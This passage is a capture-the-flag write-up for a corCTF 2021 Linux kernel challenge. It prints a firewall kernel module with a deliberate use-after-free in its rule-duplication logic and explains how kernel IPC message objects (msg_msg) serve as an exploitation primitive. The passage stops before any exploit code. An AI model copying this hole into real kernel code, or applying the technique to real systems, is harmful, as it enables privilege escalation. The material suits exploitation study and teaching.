Wall of Perdition is the second, harder part of a two-part series of kernel exploitation challenges designed by FizzBuzz101 and me for corCTF 2021. You can find the writeup for the first part, Fire of Salvation, on his blog. Unfortunately, both challenges remained unsolved during the competition. Wall of Perdition consists of a vulnerable Linux kernel module; the bug is a 0x30-byte use-after-free write in kmalloc-64. With this challenge, we present a new approach that turns the Linux kernel’s IPC mechanism, more specifically message operations, into an exploitation toolkit. Let’s get started!

Overview

For this challenge, we decided to write a kernel firewall based on Netfilter, controllable from user space via ioctl(). A user can add, edit, delete and duplicate rules (from the inbound list to the outbound list and vice versa).

We used the FGKASLR branch of the Linux kernel. Function Granular Kernel Address Space Layout Randomization increases the level of protection offered by KASLR: while KASLR moves the entire kernel text to a random location at boot time, FGKASLR additionally rearranges the kernel code at load time with per-function granularity. This makes code reuse attacks much harder to accomplish, as knowing the kernel base address (due to an information leak, for example) is no longer sufficient to calculate the address of an arbitrary function.

Supervisor Mode Execution Prevention (SMEP) and Supervisor Mode Access Prevention (SMAP) are enabled, so kernel code can neither execute code in user space nor access user-space data directly: accessors like copy_from_user() / copy_to_user() must be used, which temporarily lift the SMAP restriction (by setting the AC flag in EFLAGS via the stac instruction) before touching user-space memory.

As additional protections, we set CONFIG_STATIC_USERMODEHELPER to true, forcing all usermode helper calls through a single binary, and set CONFIG_STATIC_USERMODEHELPER_PATH to an empty string. This way it is impossible to overwrite targets like modprobe_path, core_pattern and so on to make the kernel execute an arbitrary binary.

Finally, we decided to use the SLAB allocator instead of SLUB to rule out freelist poisoning, an attack that we will discuss in a future article. Freelist randomization was also enabled.

The challenge and kernel configuration can be found here: Wall of Perdition

A Buggy Linux Kernel Firewall

We decided to release the firewall source code, so players could directly focus on the exploitation phase. Here is the source code:

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/device.h>
#include <linux/mutex.h>
#include <linux/fs.h>
#include <linux/slab.h>
#include <linux/miscdevice.h>
#include <linux/uaccess.h>
#include <linux/random.h>
#include <crypto/hash.h>
#include <linux/types.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <linux/net.h>
#include <linux/in.h>
#include <linux/skbuff.h>
#include <linux/ip.h>
#include <linux/inet.h>
#include <linux/tcp.h>
#include <linux/udp.h>


MODULE_AUTHOR("FizzBuzz and D3v17");
#ifdef EASY_MODE
MODULE_DESCRIPTION("Fire of Salvation");
#endif
#ifndef EASY_MODE
MODULE_DESCRIPTION("Wall of Perdition");
#endif
MODULE_LICENSE("GPL");


#define DEVICE_NAME "firewall"
#define CLASS_NAME  "firewall"

#define ADD_RULE 0x1337babe
#define DELETE_RULE 0xdeadbabe
#define EDIT_RULE 0x1337beef
#define SHOW_RULE 0xdeadbeef
#define DUP_RULE 0xbaad5aad

#define ERROR -1
#define SUCCESS 0
#define MAX_RULES 0x80

#define INBOUND 0
#define OUTBOUND 1
#define SKIP -1

#ifdef EASY_MODE
#define DESC_MAX 0x800
#endif


typedef struct
{
    char iface[16];
    char name[16];
    char ip[16];
    char netmask[16];
    uint8_t idx;
    uint8_t type;
    uint16_t proto;
    uint16_t port;
    uint8_t action;
    #ifdef EASY_MODE
    char desc[DESC_MAX];
    #endif
} user_rule_t;

typedef struct
{
    char iface[16];
    char name[16];
    uint32_t ip;
    uint32_t netmask;
    uint16_t proto;
    uint16_t port;
    uint8_t action;
    uint8_t is_duplicated;
    #ifdef EASY_MODE
    char desc[DESC_MAX];
    #endif
} rule_t;

rule_t **firewall_rules_in;
rule_t **firewall_rules_out;

static DEFINE_MUTEX(firewall_lock);

static long firewall_ioctl(struct file *file, unsigned int cmd, unsigned long arg);
static uint32_t firewall_inbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state);
static uint32_t firewall_outbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state);
static uint32_t process_rule(struct sk_buff *skb, rule_t *rule, uint8_t type, int i);
static long firewall_add_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_delete_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_edit_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_show_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_dup_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);

static struct miscdevice firewall_device;
static struct file_operations firewall_fops = {.unlocked_ioctl = firewall_ioctl};

static struct nf_hook_ops in_hook = {
    .hook        = firewall_inbound_hook,
    .hooknum     = NF_INET_PRE_ROUTING,
    .pf          = PF_INET,
    .priority    = NF_IP_PRI_FIRST
};

static struct nf_hook_ops out_hook = {
    .hook        = firewall_outbound_hook,
    .hooknum     = NF_INET_POST_ROUTING,
    .pf          = PF_INET,
    .priority    = NF_IP_PRI_FIRST
};


static long firewall_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
    int ret;
    user_rule_t user_rule;
    rule_t **firewall_rules;

    mutex_lock(&firewall_lock);
    memset(&user_rule, 0, sizeof(user_rule_t));

    if (copy_from_user((void *)&user_rule, (void *)arg, sizeof(user_rule_t)))
    {
        printk(KERN_INFO "[Firewall::Error] firewall_ioctl() cannot copy user request!\n");
        mutex_unlock(&firewall_lock);
        return ERROR;
    }

    if (user_rule.idx >= MAX_RULES)
    {
        printk(KERN_INFO "[Firewall::Info] firewall_ioctl() invalid index!\n");
        mutex_unlock(&firewall_lock);
        return ERROR;
    }

    if ((user_rule.type != INBOUND) && (user_rule.type != OUTBOUND))
    {
        printk(KERN_INFO "[Firewall::Error] firewall_ioctl() invalid rule type!\n");
        mutex_unlock(&firewall_lock);
        return ERROR;
    }

    firewall_rules = (user_rule.type == INBOUND) ? firewall_rules_in : firewall_rules_out;

    switch (cmd)
    {
        case ADD_RULE:
            ret = firewall_add_rule(user_rule, firewall_rules, user_rule.idx);
            break;

        case DELETE_RULE:
            ret = firewall_delete_rule(user_rule, firewall_rules, user_rule.idx);
            break;

        case SHOW_RULE:
            ret = firewall_show_rule(user_rule, firewall_rules, user_rule.idx);
            break;

        case EDIT_RULE:
            ret = firewall_edit_rule(user_rule, firewall_rules, user_rule.idx);
            break;

        case DUP_RULE:
            ret = firewall_dup_rule(user_rule, firewall_rules, user_rule.idx);
            break;

        default:
            ret = ERROR;
            break;
    }

    mutex_unlock(&firewall_lock);

    return ret;
}


static long firewall_add_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
    printk(KERN_INFO "[Firewall::Info] firewall_add_rule() adding new rule!\n");

    if (firewall_rules[idx] != NULL)
    {
        printk(KERN_INFO "[Firewall::Error] firewall_add_rule() invalid rule slot!\n");
        return ERROR;
    }

    firewall_rules[idx] = (rule_t *)kzalloc(sizeof(rule_t), GFP_KERNEL);

    if (!firewall_rules[idx])
    {
        printk(KERN_INFO "[Firewall::Error] firewall_add_rule() allocation error!\n");
        return ERROR;
    }

    memcpy(firewall_rules[idx]->iface, user_rule.iface, 16);
    memcpy(firewall_rules[idx]->name, user_rule.name, 16);

    #ifdef EASY_MODE
    strncpy(firewall_rules[idx]->desc, user_rule.desc, DESC_MAX);
    #endif

    if (in4_pton(user_rule.ip, strnlen(user_rule.ip, 16), (u8 *)&(firewall_rules[idx]->ip), -1, NULL) == 0)
    {
        printk(KERN_ERR "[Firewall::Error] firewall_add_rule() invalid IP format!\n");
        kfree(firewall_rules[idx]);
        firewall_rules[idx] = NULL;
        return ERROR;
    }

    if (in4_pton(user_rule.netmask, strnlen(user_rule.netmask, 16), (u8 *)&(firewall_rules[idx]->netmask), -1, NULL) == 0)
    {
        printk(KERN_ERR "[Firewall::Error] firewall_add_rule() invalid Netmask format!\n");
        kfree(firewall_rules[idx]);
        firewall_rules[idx] = NULL;
        return ERROR;
    }

    firewall_rules[idx]->proto = user_rule.proto;
    firewall_rules[idx]->port = ntohs(user_rule.port);
    firewall_rules[idx]->action = user_rule.action;
    firewall_rules[idx]->is_duplicated = 0;

    printk(KERN_ERR "[Firewall::Info] firewall_add_rule() new rule added!\n");

    return SUCCESS;
}


static long firewall_delete_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
    printk(KERN_INFO "[Firewall::Info] firewall_delete_rule() deleting rule!\n");

    if (firewall_rules[idx] == NULL)
    {
        printk(KERN_INFO "[Firewall::Error] firewall_delete_rule() invalid rule slot!\n");
        return ERROR;
    }

    kfree(firewall_rules[idx]); // [3]
    firewall_rules[idx] = NULL;

    return SUCCESS;
}


static long firewall_edit_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
    printk(KERN_INFO "[Firewall::Info] firewall_edit_rule() editing rule!\n");

    #ifdef EASY_MODE
    printk(KERN_INFO "[Firewall::Error] Note that description editing is not implemented.\n");
    #endif

    if (firewall_rules[idx] == NULL)
    {
        printk(KERN_INFO "[Firewall::Error] firewall_edit_rule() invalid idx!\n");
        return ERROR;
    }

    memcpy(firewall_rules[idx]->iface, user_rule.iface, 16);
    memcpy(firewall_rules[idx]->name, user_rule.name, 16);

    if (in4_pton(user_rule.ip, strnlen(user_rule.ip, 16), (u8 *)&(firewall_rules[idx]->ip), -1, NULL) == 0)
    {
        printk(KERN_ERR "[Firewall::Error] firewall_edit_rule() invalid IP format!\n");
        return ERROR;
    }

    if (in4_pton(user_rule.netmask, strnlen(user_rule.netmask, 16), (u8 *)&(firewall_rules[idx]->netmask), -1, NULL) == 0)
    {
        printk(KERN_ERR "[Firewall::Error] firewall_edit_rule() invalid Netmask format!\n");
        return ERROR;
    }

    firewall_rules[idx]->proto = user_rule.proto;
    firewall_rules[idx]->port = ntohs(user_rule.port);
    firewall_rules[idx]->action = user_rule.action;

    printk(KERN_ERR "[Firewall::Info] firewall_edit_rule() rule edited!\n");

    return SUCCESS;
}


static long firewall_show_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
    printk(KERN_INFO "[Firewall::Error] Function not implemented.\n");
    return ERROR;
}


static long firewall_dup_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
    uint8_t i;
    rule_t **dup;

    printk(KERN_INFO "[Firewall::Info] firewall_dup_rule() duplicating rule!\n");

    dup = (user_rule.type == INBOUND) ? firewall_rules_out : firewall_rules_in;

    if (firewall_rules[idx] == NULL)
    {
        printk(KERN_INFO "[Firewall::Error] firewall_dup_rule() nothing to duplicate!\n");
        return ERROR;
    }

    if (firewall_rules[idx]->is_duplicated)
    {
        printk(KERN_INFO "[Firewall::Info] firewall_dup_rule() rule already duplicated before!\n");
        return ERROR;
    }

    for (i = 0; i < MAX_RULES; i++)
    {
        if (dup[i] == NULL)
        {
            dup[i] = firewall_rules[idx];
            firewall_rules[idx]->is_duplicated = 1;
            printk(KERN_INFO "[Firewall::Info] firewall_dup_rule() rule duplicated!\n");
            return SUCCESS;
        }
    }

    printk(KERN_INFO "[Firewall::Error] firewall_dup_rule() nowhere to duplicate!\n");

    return ERROR;
}


static uint32_t process_rule(struct sk_buff *skb, rule_t *rule, uint8_t type, int i)
{
    struct iphdr *iph;
    struct tcphdr *tcph;
    struct udphdr *udph;

    printk(KERN_INFO "[Firewall::Info] rule->iface: %s...\n", rule->iface);
    printk(KERN_INFO "[Firewall::Info] skb->dev->name: %s...\n", skb->dev->name);

    if (strncmp(rule->iface, skb->dev->name, 16) != 0)
    {
        printk(KERN_INFO "[Firewall::Error] Rule[%d], interface doesn't match, skipping!\n", i);
        return SKIP;
    }

    iph = ip_hdr(skb);

    if (type == INBOUND)
    {
        if ((rule->ip & rule->netmask) != (iph->saddr & rule->netmask))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], ip->saddr doesn't belong to the provided subnet, skipping!\n", i);
            return SKIP;
        }
    }
    else
    {
        if ((rule->ip & rule->netmask) != (iph->daddr & rule->netmask))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], ip->daddr doesn't belong to the provided subnet, skipping!\n", i);
            return SKIP;
        }
    }

    if ((rule->proto == IPPROTO_TCP) && (iph->protocol == IPPROTO_TCP))
    {
        printk(KERN_INFO "[Firewall::Info] Rule[%d], protocol is TCP\n", i);

        tcph = tcp_hdr(skb);

        if ((rule->port != 0) && (rule->port != tcph->dest))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], rule->port (%d) != tcph->dest (%d), skipping!\n", i, ntohs(rule->port), ntohs(tcph->dest));
            return SKIP;
        }

        if ((rule->action != NF_DROP) && (rule->action != NF_ACCEPT))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], invalid action (%d), skipping!\n", i, rule->action);
            return SKIP;
        }

        printk(KERN_INFO "[Firewall::Info] %s Rule[%d], action %d\n", (type == INBOUND) ? "Inbound" : "Outbound", i, rule->action);

        return rule->action;
    }

    else if ((rule->proto == IPPROTO_UDP) && (iph->protocol == IPPROTO_UDP))
    {
        printk(KERN_INFO "[Firewall::Info] Rule[%d], protocol is UDP\n", i);

        udph = udp_hdr(skb);

        if ((rule->port != 0) && (rule->port != udph->dest))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], rule->port (%d) != udph->dest (%d), skipping!\n", i, ntohs(rule->port), ntohs(udph->dest));
            return SKIP;
        }

        if ((rule->action != NF_DROP) && (rule->action != NF_ACCEPT))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], invalid action (%d), skipping!\n", i, rule->action);
            return SKIP;
        }

        printk(KERN_INFO "[Firewall::Info] %s Rule[%d], action %d\n", (type == INBOUND) ? "Inbound" : "Outbound", i, rule->action);

        return rule->action;
    }

    return SKIP;
}


static uint32_t firewall_inbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
    int i;
    uint32_t ret;

    for (i = 0; i < MAX_RULES; i++)
    {
        if (firewall_rules_in[i])
        {
            ret = process_rule(skb, firewall_rules_in[i], INBOUND, i);

            if (ret != SKIP)
                return ret;
        }
    }

    return NF_ACCEPT;
}


static uint32_t firewall_outbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
    int i;
    uint32_t ret;

    for (i = 0; i < MAX_RULES; i++)
    {
        if (firewall_rules_out[i])
        {
            ret = process_rule(skb, firewall_rules_out[i], OUTBOUND, i);

            if (ret != SKIP)
                return ret;
        }
    }

    return NF_ACCEPT;
}


static int init_firewall(void)
{
    mutex_init(&firewall_lock);

    firewall_device.minor = MISC_DYNAMIC_MINOR;
    firewall_device.name = DEVICE_NAME;
    firewall_device.fops = &firewall_fops;

    if (misc_register(&firewall_device))
    {
        printk(KERN_INFO "[Firewall::Error] Device registration failed!\n");
        return ERROR;
    }

    printk(KERN_INFO "[Firewall::Init] Initializing firewall...\n");

    firewall_rules_in = kzalloc(sizeof(void *) * MAX_RULES, GFP_KERNEL);
    firewall_rules_out = kzalloc(sizeof(void *) * MAX_RULES, GFP_KERNEL);

    if (nf_register_net_hook(&init_net, &in_hook) < 0)
    {
        printk(KERN_INFO "[Firewall::Error] Cannot register nf hook!\n");
        return ERROR;
    }

    if (nf_register_net_hook(&init_net, &out_hook) < 0)
    {
        printk(KERN_INFO "[Firewall::Error] Cannot register nf hook!\n");
        return ERROR;
    }

    printk(KERN_INFO "[Firewall::Init] Firewall initialized!\n");
    #ifdef EASY_MODE
    printk(KERN_INFO "[Firewall::Init] 👼 Welcome to Easy Mode 👼\n");
    #else
    printk(KERN_INFO "[Firewall::Init] 😈 Welcome to Hard Mode 😈\n");
    #endif
    return SUCCESS;
}


static void cleanup_firewall(void)
{
    int i;

    printk(KERN_INFO "[Firewall::Exit] Cleaning up...\n");

    for (i = 0; i < MAX_RULES; i++)
    {
        if (firewall_rules_in[i] != NULL)
        {
            kfree(firewall_rules_in[i]);
        }

        if (firewall_rules_out[i] != NULL)
        {
            kfree(firewall_rules_out[i]);
        }
    }

    memset(firewall_rules_in, 0, sizeof(void *) * MAX_RULES);
    memset(firewall_rules_out, 0, sizeof(void *) * MAX_RULES);

    kfree(firewall_rules_in);
    firewall_rules_in = NULL;

    kfree(firewall_rules_out);
    firewall_rules_out = NULL;

    nf_unregister_net_hook(&init_net, &in_hook);
    nf_unregister_net_hook(&init_net, &out_hook);

    misc_deregister(&firewall_device);
    mutex_destroy(&firewall_lock);

    printk(KERN_INFO "[Firewall::Exit] Cleanup done, bye!\n");
}


module_init(init_firewall);
module_exit(cleanup_firewall);

As we mentioned in the introduction, a user can interact with the firewall using ioctl(). There are five exposed commands, backed by firewall_add_rule(), firewall_delete_rule(), firewall_edit_rule(), firewall_show_rule() and firewall_dup_rule(). As we can see from the source code, firewall_show_rule(), despite being exposed, is not implemented.

The firewall is based on Netfilter and uses two Netfilter hooks: a prerouting hook to filter incoming packets (firewall_inbound_hook()) and a postrouting hook to filter outgoing packets (firewall_outbound_hook()). For this reason the source code keeps two lists of pointers to rules, firewall_rules_in and firewall_rules_out. Each list can contain up to 128 rule pointers.


The request format used to interact with the firewall is defined by the type user_rule_t. The IP address and netmask are sent to the kernel as character buffers and are subsequently converted to integers in kernel space by in4_pton(), as we can see in firewall_add_rule() and firewall_edit_rule().

Other required fields include interface name, rule name, rule index, port, type (0 for inbound or 1 for outbound), protocol, and the action to be taken when there is a match in process_rule().

Once the IP and netmask have been converted to integers, the user request is transferred into a new structure handled by the kernel, defined by the type rule_t. This structure is allocated in kmalloc-64, since its size is 0x30 bytes.

Because the exploitation phase is relatively complex, we decided to make the bug very easy to spot. firewall_dup_rule() allows users to duplicate rules from the firewall_rules_in list to the firewall_rules_out list and vice versa.

The problem arises if we duplicate a rule and then free it using firewall_delete_rule(): the function calls kfree() on the rule pointer and sets the list entry to NULL, but the same pointer remains reachable through the other list.

This leads to a 0x30-byte use-after-free write in kmalloc-64, using firewall_edit_rule() to modify the freed, but still reachable, rule.

A Dive Into Linux Kernel’s IPC

To exploit the UAF in kmalloc-64, we are going to abuse the Linux kernel’s IPC mechanism, more specifically, message operations.

The kernel offers two syscalls to perform Inter Process Communication using messages, msgsnd() and msgrcv(), respectively used to send messages to, and receive messages from a message queue.

A message in kernel space is composed of two parts: a message header, described by the structure msg_msg, and the message data, which follows immediately after. Here is the msg_msg structure:

struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts;      /* message text size */
    struct msg_msgseg *next;
    void *security;
    /* the actual message follows immediately */
};

This elastic object is extensively used by kernel exploit developers to perform heap sprays. The size of the message is controlled by the user, so it can be allocated in multiple caches, from kmalloc-64 up to kmalloc-4k.

Every time msgsnd() is used to send a message, the kernel calls do_msgsnd(), which calls load_msg(), which in turn calls alloc_msg() to allocate the objects required to contain message header and message data.

The message content is subsequently copied from user space to kernel space in load_msg().

For example, let’s say we want to send a message consisting of 0x1fc8 ‘A’s: we first create a message queue using msgget() then we send the actual message using msgsnd():

[...]

struct msgbuf
{
    long mtype;
    char mtext[0x1fc8];
} msg;

msg.mtype = 1;
memset(msg.mtext, 'A', sizeof(msg.mtext));

qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
msgsnd(qid, &msg, sizeof(msg.mtext), 0);

[...]

Now let’s examine the source code of alloc_msg() and load_msg() to understand what happens in kernel space:

static struct msg_msg *alloc_msg(size_t len)
{
    struct msg_msg *msg;
    struct msg_msgseg **pseg;
    size_t alen;

    alen = min(len, DATALEN_MSG); // [1]
    msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT); // [2]
    if (msg == NULL)
        return NULL;

    msg->next = NULL;
    msg->security = NULL;

    len -= alen; // [3]
    pseg = &msg->next;
    while (len > 0) {
        struct msg_msgseg *seg;

        cond_resched();

        alen = min(len, DATALEN_SEG); // [4]
        seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT); // [5]
        if (seg == NULL)
            goto out_err;
        *pseg = seg; // [6]
        seg->next = NULL;
        pseg = &seg->next;
        len -= alen;
    }

    return msg;

out_err:
    free_msg(msg);
    return NULL;
}

As we can see in the source code above, in alloc_msg(), the kernel calculates alen = min(len, DATALEN_MSG); [1], where len is the message size provided by the user, 0x1fc8 in our case, and DATALEN_MSG corresponds to ((size_t)PAGE_SIZE - sizeof(struct msg_msg)).

By default PAGE_SIZE is equal to 0x1000 bytes, and sizeof(struct msg_msg) is equal to 0x30 bytes, therefore DATALEN_MSG corresponds to 0xfd0 bytes, and that line, in our case, will result in alen = min(0x1fc8, 0xfd0) = 0xfd0.

At the next line, the kernel allocates the message using msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT); [2]. Here sizeof(*msg) is equal to 0x30 bytes (the message header size) and alen, as we discussed above, is equal to 0xfd0. In our case that line becomes msg = kmalloc(0x1000, GFP_KERNEL_ACCOUNT);, so this message will be allocated in kmalloc-4k.

After a couple of lines, len, the message size provided by the user, is decremented by alen [3], then the kernel starts allocating all necessary segments to store the remaining data until len is equal to zero. Segments are connected in a singly linked list.

The size of a segment is calculated by alen = min(len, DATALEN_SEG); [4], in other words min(remaining size, DATALEN_SEG). In our case len was decremented by alen, so it is now len = 0x1fc8 - 0xfd0 = 0xff8.

DATALEN_SEG is defined as ((size_t)PAGE_SIZE - sizeof(struct msg_msgseg)) and since sizeof(struct msg_msgseg) is equal to 0x8 bytes, DATALEN_SEG corresponds to 0xff8 bytes. That line will result in alen = min(0xff8, 0xff8) = 0xff8;.

At the next line, the segment is allocated using seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT); [5]. Since sizeof(*seg) is equal to 0x8 bytes and alen is now 0xff8, that line becomes seg = kmalloc(0x1000, GFP_KERNEL_ACCOUNT);. This segment, too, will be allocated in kmalloc-4k.

Finally, the segment pointer is saved in the message header [6], and the function returns the pointer to the message.

At this point load_msg() is ready to copy the message content from user space to kernel space:

struct msg_msg *load_msg(const void __user *src, size_t len)
{
    struct msg_msg *msg;
    struct msg_msgseg *seg;
    int err = -EFAULT;
    size_t alen;

    msg = alloc_msg(len); // [1]
    if (msg == NULL)
        return ERR_PTR(-ENOMEM);

    alen = min(len, DATALEN_MSG);
    if (copy_from_user(msg + 1, src, alen)) // [2]
        goto out_err;

    for (seg = msg->next; seg != NULL; seg = seg->next) {
        len -= alen;
        src = (char __user *)src + alen;
        alen = min(len, DATALEN_SEG);
        if (copy_from_user(seg + 1, src, alen)) // [3]
            goto out_err;
    }

    err = security_msg_msg_alloc(msg);
    if (err)
        goto out_err;

    return msg;

out_err:
    free_msg(msg);
    return ERR_PTR(err);
}

As we can see from the load_msg() source code, after allocating the message using alloc_msg() [1], it starts copying the message data from user space to the allocated memory region in kernel space [2].

Then it copies the remaining data into the segments [3]. In our case it copies the first 0xfd0 bytes into the message object and the remaining 0xff8 bytes into the segment.

Of course, in our case we only have a single segment, so its next pointer will be NULL.

Here is our message in kernel memory:

[figure: the msg_msg header and data in kernel memory]

And here is the corresponding segment:

[figure: the msg_msgseg segment in kernel memory]

Now let’s see what happens when we use msgrcv() to receive the message:

void *memdump = malloc(0x1fc8);
msgrcv(qid, memdump, 0x1fc8, 1, IPC_NOWAIT | MSG_NOERROR);

First, the kernel calls do_msgrcv(), setting its sixth argument, the msg_handler() function pointer, to do_msg_fill() as we can see in ksys_msgrcv():

long ksys_msgrcv(int msqid, struct msgbuf __user *msgp, size_t msgsz,
            long msgtyp, int msgflg)
{
    return do_msgrcv(msqid, msgp, msgsz, msgtyp, msgflg, do_msg_fill);
}

Later on, do_msg_fill() will be used to copy the message from kernel space to user space. Here is the source code of do_msgrcv():

static long do_msgrcv(int msqid, void __user *buf, size_t bufsz, long msgtyp, int msgflg,
            long (*msg_handler)(void __user *, struct msg_msg *, size_t))
{
    int mode;
    struct msg_queue *msq;
    struct ipc_namespace *ns;
    struct msg_msg *msg, *copy = NULL;
    DEFINE_WAKE_Q(wake_q);

    ns = current->nsproxy->ipc_ns;

    if (msqid < 0 || (long) bufsz < 0)
        return -EINVAL;

    if (msgflg & MSG_COPY) {
        if ((msgflg & MSG_EXCEPT) || !(msgflg & IPC_NOWAIT))
            return -EINVAL;
        copy = prepare_copy(buf, min_t(size_t, bufsz, ns->msg_ctlmax)); // [4]
        if (IS_ERR(copy))
            return PTR_ERR(copy);
    }
    mode = convert_mode(&msgtyp, msgflg);

    rcu_read_lock();
    msq = msq_obtain_object_check(ns, msqid);
    if (IS_ERR(msq)) {
        rcu_read_unlock();
        free_copy(copy);
        return PTR_ERR(msq);
    }

    for (;;) {
        struct msg_receiver msr_d;

        msg = ERR_PTR(-EACCES);
        if (ipcperms(ns, &msq->q_perm, S_IRUGO))
            goto out_unlock1;

        ipc_lock_object(&msq->q_perm);

        /* raced with RMID? */
        if (!ipc_valid_object(&msq->q_perm)) {
            msg = ERR_PTR(-EIDRM);
            goto out_unlock0;
        }

        msg = find_msg(msq, &msgtyp, mode); // [1]
        if (!IS_ERR(msg)) {
            /*
                * Found a suitable message.
                * Unlink it from the queue.
                */
            if ((bufsz < msg->m_ts) && !(msgflg & MSG_NOERROR)) {
                msg = ERR_PTR(-E2BIG);
                goto out_unlock0;
            }
            /*
                * If we are copying, then do not unlink message and do
                * not update queue parameters.
                */
            if (msgflg & MSG_COPY) {
                msg = copy_msg(msg, copy); // [5]
                goto out_unlock0;
            }

            list_del(&msg->m_list);
            msq->q_qnum--;
            msq->q_rtime = ktime_get_real_seconds();
            ipc_update_pid(&msq->q_lrpid, task_tgid(current));
            msq->q_cbytes -= msg->m_ts;
            atomic_sub(msg->m_ts, &ns->msg_bytes);
            atomic_dec(&ns->msg_hdrs);
            ss_wakeup(msq, &wake_q, false);

            goto out_unlock0;
        }

        /* No message waiting. Wait for a message */
        if (msgflg & IPC_NOWAIT) {
            msg = ERR_PTR(-ENOMSG);
            goto out_unlock0;
        }

        list_add_tail(&msr_d.r_list, &msq->q_receivers);
        msr_d.r_tsk = current;
        msr_d.r_msgtype = msgtyp;
        msr_d.r_mode = mode;
        if (msgflg & MSG_NOERROR)
            msr_d.r_maxsize = INT_MAX;
        else
            msr_d.r_maxsize = bufsz;

        /* memory barrier not require due to ipc_lock_object() */
        WRITE_ONCE(msr_d.r_msg, ERR_PTR(-EAGAIN));

        /* memory barrier not required, we own ipc_lock_object() */
        __set_current_state(TASK_INTERRUPTIBLE);

        ipc_unlock_object(&msq->q_perm);
        rcu_read_unlock();
        schedule();

        /*
            * Lockless receive, part 1:
            * We don't hold a reference to the queue and getting a
            * reference would defeat the idea of a lockless operation,
            * thus the code relies on rcu to guarantee the existence of
            * msq:
            * Prior to destruction, expunge_all(-EIRDM) changes r_msg.
            * Thus if r_msg is -EAGAIN, then the queue not yet destroyed.
            */
        rcu_read_lock();

        /*
            * Lockless receive, part 2:
            * The work in pipelined_send() and expunge_all():
            * - Set pointer to message
            * - Queue the receiver task for later wakeup
            * - Wake up the process after the lock is dropped.
            *
            * Should the process wake up before this wakeup (due to a
            * signal) it will either see the message and continue ...
            */
        msg = READ_ONCE(msr_d.r_msg);
        if (msg != ERR_PTR(-EAGAIN)) {
            /* see MSG_BARRIER for purpose/pairing */
            smp_acquire__after_ctrl_dep();

            goto out_unlock1;
        }

            /*
            * ... or see -EAGAIN, acquire the lock to check the message
            * again.
            */
        ipc_lock_object(&msq->q_perm);

        msg = READ_ONCE(msr_d.r_msg);
        if (msg != ERR_PTR(-EAGAIN))
            goto out_unlock0;

        list_del(&msr_d.r_list);
        if (signal_pending(current)) {
            msg = ERR_PTR(-ERESTARTNOHAND);
            goto out_unlock0;
        }

        ipc_unlock_object(&msq->q_perm);
    }

out_unlock0:
    ipc_unlock_object(&msq->q_perm);
    wake_up_q(&wake_q);
out_unlock1:
    rcu_read_unlock();
    if (IS_ERR(msg)) {
        free_copy(copy);
        return PTR_ERR(msg);
    }

    bufsz = msg_handler(buf, msg, bufsz); // [2]
    free_msg(msg); // [3]

    return bufsz;
}

As we can see, in do_msgrcv() the kernel uses find_msg() to locate the requested message [1]; then, on success, after performing some checks and unlinking the message from the message queue, it calls msg_handler() (previously set to do_msg_fill()) to copy the message from kernel space to user space [2]:

static long do_msg_fill(void __user *dest, struct msg_msg *msg, size_t bufsz)
{
    struct msgbuf __user *msgp = dest;
    size_t msgsz;

    if (put_user(msg->m_type, &msgp->mtype))
        return -EFAULT;

    msgsz = (bufsz > msg->m_ts) ? msg->m_ts : bufsz; // [2.1]
    if (store_msg(msgp->mtext, msg, msgsz)) // [2.2]
        return -EFAULT;
    return msgsz;
}

do_msg_fill() checks whether the requested message size is greater than the size saved in msg->m_ts [2.1]. If the requested size exceeds the size saved in the message header, only m_ts bytes are copied; otherwise the size provided by the user is used.

This check is necessary to avoid an Out Of Bounds Read when the user calls msgrcv(). In our case, msgsz will be equal to 0x1fc8 bytes.

Finally, store_msg() is called [2.2]. It copies msgsz bytes (0x1fc8 in our case) from kernel space to the buffer provided by the user:

int store_msg(void __user *dest, struct msg_msg *msg, size_t len)
{
    size_t alen;
    struct msg_msgseg *seg;

    alen = min(len, DATALEN_MSG); // [2.2.1]
    if (copy_to_user(dest, msg + 1, alen)) // [2.2.2]
        return -1;

    for (seg = msg->next; seg != NULL; seg = seg->next) { // [2.2.3]
        len -= alen;
        dest = (char __user *)dest + alen;
        alen = min(len, DATALEN_SEG); // [2.2.4]
        if (copy_to_user(dest, seg + 1, alen)) // [2.2.5]
            return -1;
    }
    return 0;
}

store_msg() first computes alen [2.2.1] (0xfd0 in our case, the same limit we have already seen in load_msg() and alloc_msg()) and copies that many bytes of message data to the user space buffer [2.2.2]. It then traverses the list of segments until none are left [2.2.3], recalculating alen each time [2.2.4] and copying the segment data to user space [2.2.5]. In our case there is a single segment, from which 0xff8 bytes are copied.
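To double-check the sizes used throughout this writeup, here is a small sketch (assuming the usual 4K-page x86_64 constants) of how a msgsnd() payload splits between the msg_msg chunk and its segments. Note that 0xfd0 + 0xff8 = 0x1fc8, exactly our payload size:

```c
#include <stddef.h>

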